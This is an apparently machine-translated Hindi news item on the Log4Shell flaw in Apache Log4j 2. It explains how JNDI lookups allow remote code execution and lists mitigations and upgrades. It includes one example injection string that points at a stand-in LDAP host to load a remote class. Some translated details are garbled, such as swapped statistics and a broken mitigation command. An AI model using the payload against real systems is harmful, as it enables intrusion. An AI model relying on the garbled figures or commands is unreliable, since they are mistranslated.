हाल ही में एसe ने समाचार जारी किया कि Apache Log4j 2 में एक गंभीर भेद्यता की पहचान की गई थी, जिसे जावा अनुप्रयोगों में रजिस्ट्री को व्यवस्थित करने के लिए एक लोकप्रिय ढांचे के रूप में वर्णित किया गया है, जो "{jndi: URL}" प्रारूप में रजिस्ट्री को विशेष रूप से स्वरूपित मान लिखे जाने पर मनमाने कोड को निष्पादित करने की अनुमति देता है।
भेद्यता यह उल्लेखनीय है क्योंकि जावा अनुप्रयोगों में हमला किया जा सकता है किवे बाहरी स्रोतों से प्राप्त मूल्यों को रिकॉर्ड करते हैं, उदाहरण के लिए त्रुटि संदेशों में समस्याग्रस्त मान प्रदर्शित करके।
यह देखा गया है कि अपाचे स्ट्रट्स, अपाचे सोलर, अपाचे ड्र्यूड या अपाचे फ्लिंक जैसे ढांचे का उपयोग करने वाली लगभग सभी परियोजनाएं प्रभावित होती हैं, स्टीम, ऐप्पल आईक्लाउड, माइनक्राफ्ट क्लाइंट और सर्वर सहित।
भेद्यता से उद्यम अनुप्रयोगों पर बड़े पैमाने पर हमलों की लहर पैदा होने की उम्मीद है, ढांचे में महत्वपूर्ण कमजोरियों के इतिहास को दोहराते हुए, अपाचे स्ट्रट्स, जो कि फॉर्च्यून 65 वेब अनुप्रयोगों के 100% में उपयोग किया जाने वाला एक अनुमानित अनुमान है। कंपनी के वेब अनुप्रयोगों की सूची कमजोर प्रणालियों के लिए नेटवर्क को स्कैन करने के लिए पहले से रिकॉर्ड किए गए प्रयास शामिल हैं।
भेद्यता अनधिकृत कोड के दूरस्थ निष्पादन की अनुमति देती है। Log4j 2 Apache Foundation द्वारा विकसित एक ओपन सोर्स जावा लॉग लाइब्रेरी है। Log4j 2 व्यापक रूप से कई अनुप्रयोगों में उपयोग किया जाता है और कई सेवाओं में एक निर्भरता के रूप में मौजूद है। इनमें व्यावसायिक अनुप्रयोगों के साथ-साथ कई क्लाउड सेवाएं शामिल हैं।
रैंडोरी हमले की टीम ने एक कार्यात्मक शोषण विकसित किया है और हमारे आक्रामक सुरक्षा मंच के हिस्से के रूप में ग्राहक वातावरण में इस भेद्यता का सफलतापूर्वक फायदा उठाने में सक्षम है।
भेद्यता को एप्लिकेशन-विशिष्ट विधियों की एक भीड़ के माध्यम से पहुँचा जा सकता है। वास्तव में, कोई भी परिदृश्य जो रिमोट कनेक्शन को मनमाने डेटा की आपूर्ति करने की अनुमति देता है, जो लॉग 4j लाइब्रेरी का उपयोग करके लॉग फाइलों को लिखता है, शोषण के लिए अतिसंवेदनशील है। इस भेद्यता का जंगली में शोषण होने की अत्यधिक संभावना है और हजारों संगठनों को प्रभावित करने की संभावना है। यह भेद्यता प्रभावित प्रणालियों के लिए एक महत्वपूर्ण वास्तविक जोखिम का प्रतिनिधित्व करती है।
समस्या इस तथ्य से जटिल है कि एक कार्यात्मक शोषण पहले ही प्रकाशित हो चुका है, उदा।लेकिन स्थिर शाखाओं के लिए सुधार अभी तक उत्पन्न नहीं हुए हैं। CVE पहचानकर्ता को अभी तक असाइन नहीं किया गया है। समाधान केवल log4j-2.15.0-rc1 परीक्षण शाखा में शामिल है। भेद्यता को अवरुद्ध करने के लिए एक वैकल्पिक हल के रूप में, पैरामीटर Log4j2.formatMsgNoLookups को सत्य पर सेट करने की अनुशंसा की जाती है।
समस्या यह इस तथ्य के कारण था कि Log4j 2 लॉग लाइनों में विशेष मास्क «{}» के संचालन का समर्थन करता है, जिसमें JNDI क्वेरी चलाई जा सकती हैं (जावा नामकरण और निर्देशिका इंटरफ़ेस)।
CVE-2021-44228 का विश्लेषण करते हुए, Randori ने निम्नलिखित निर्धारित किया है:
व्यापक रूप से उपयोग किए जाने वाले व्यावसायिक सॉफ़्टवेयर के डिफ़ॉल्ट इंस्टॉलेशन असुरक्षित हैं।
भेद्यता का मज़बूती से और प्रमाणीकरण के बिना शोषण किया जा सकता है।
भेद्यता Log4j 2 के कई संस्करणों को प्रभावित करती है।
जब उपयोगकर्ता लाइब्रेरी का उपयोग करके एप्लिकेशन चलाता है तो भेद्यता रिमोट कोड निष्पादन की अनुमति देती है।
"$ {jndi: ldap: //example.com/a}" प्रतिस्थापन के साथ एक स्ट्रिंग पास करने के लिए हमला उबलता है, प्रसंस्करण जो Log4j 2 जावा क्लास के पथ के लिए हमलावर.com सर्वर को पथ के लिए एलडीएपी अनुरोध भेजेगा . हमलावर के सर्वर द्वारा लौटाया गया पथ (उदाहरण के लिए, http://example.com/Exploit.class) वर्तमान प्रक्रिया के संदर्भ में लोड और निष्पादित किया जाएगा, जिससे हमलावर को अधिकारों के साथ सिस्टम पर मनमाने कोड निष्पादन प्राप्त करने की अनुमति मिलती है। वर्तमान आवेदन की।
अंत में, यह उल्लेख किया गया है कि यदि असामान्यताएं पाई जाती हैं, यह अनुशंसा की जाती है कि आप मान लें कि यह एक सक्रिय घटना है, कि इससे समझौता किया गया है, और तदनुसार प्रतिक्रिया दें। Log4j 2 या प्रभावित अनुप्रयोगों के पैच किए गए संस्करणों में अपग्रेड करने से यह भेद्यता समाप्त हो जाएगी। रैंडोरी किसी भी संगठन की सिफारिश करता है जो उसे लगता है कि प्रभावित हो सकता है एक पैच किए गए संस्करण में तत्काल अपग्रेड करें।
Apache Log4j टीम के नवीनतम अपडेट में, अनुशंसा करते हैं कि संगठन निम्नलिखित कार्य करें
- Log4j 2.15.0 . में अपडेट करें
- उनके लिए जो 2.15.0 में अपग्रेड नहीं कर सकते: वर्जन> = 2.10 में, इस भेद्यता को log4j2.formatMsgNoLookup सिस्टम प्रॉपर्टी या LOG4J_FORMAT_MSG_NO_LOOKUPS पर्यावरण चर को सही पर सेट करके कम किया जा सकता है।
- संस्करण 2,0-बीटा9 से 2.10.0 के लिए, न्यूनीकरण JndiLookup क्लास को क्लासपाथ से हटाने के लिए है: zip -q -d log4j-core - *. Jar org / apache / logging / log4j / core /lookup /JndiLookup.class।
Fuente: https://www.lunasec.io/